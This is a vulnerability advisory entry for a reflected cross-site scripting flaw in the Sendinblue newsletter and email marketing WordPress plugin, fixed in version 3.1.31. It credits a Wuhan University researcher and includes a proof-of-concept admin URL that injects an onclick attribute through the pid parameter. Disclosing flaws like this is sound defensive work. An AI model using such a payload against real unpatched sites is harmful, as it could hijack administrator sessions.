WordPress Plugin Vulnerabilities
Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting
Description
The plugin does not escape the lang and pid parameter before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
Proof of Concept
https://example.com/wp-admin/admin.php?sib_page_form&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22
Affects Plugins
Fixed in version 3.1.31
References
Classification
Miscellaneous
Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-12 (about 1 years ago)
Added
2022-01-12 (about 1 years ago)
Last Updated
2022-09-26 (about 4 months ago)